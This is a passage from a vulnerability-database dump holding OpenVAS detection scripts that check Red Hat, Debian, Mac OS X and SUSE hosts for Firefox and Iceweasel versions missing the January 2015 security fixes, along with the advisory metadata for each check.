72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 13:36:16 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Firefox ESR Multiple Vulnerabilities-01 Jan15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - Some unspecified errors.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions, and compromise a user's\n system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR 31.x before 31.4 on\n Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 31.4\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/firefox/organizations\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(ffVer =~ \"^31\\.\")\n{\n if((version_in_range(version:ffVer, test_version:\"31.0\", test_version2:\"31.3\")))\n {\n fix = \"31.4\";\n report = 'Installed version: ' + ffVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "RedHat Update for firefox RHSA-2015:0046-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871302", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for firefox RHSA-2015:0046-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871302\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:55:30 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for firefox RHSA-2015:0046-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n * The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"affected\", value:\"firefox on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0046-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-January/msg00016.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~31.4.0~1.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~31.4.0~1.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner-debuginfo\", rpm:\"xulrunner-debuginfo~31.4.0~1.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~31.4.0~1.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~31.4.0~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~31.4.0~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:50", "description": "Multiple security issues have been found\nin Iceweasel, Debian", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3127-1 (iceweasel - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703127", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3127.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3127-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703127\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_name(\"Debian Security Advisory DSA 3127-1 (iceweasel - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-14 00:00:00 +0100 (Wed, 14 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3127.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"iceweasel on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 31.4.0esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0esr-1.\n\nWe recommend that you upgrade your iceweasel packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been found\nin Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory\nsafety errors and implementation errors may lead to the execution of arbitrary code,\ninformation leaks or denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-csb\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ku\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zu\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmozjs17d\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmozjs17d-dbg\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xulrunner-17.0\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xulrunner-17.0-dbg\", ver:\"31.4.0esr-1~deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:38:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for MozillaFirefox (SUSE-SU-2015:0076-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-1569", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850870", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# 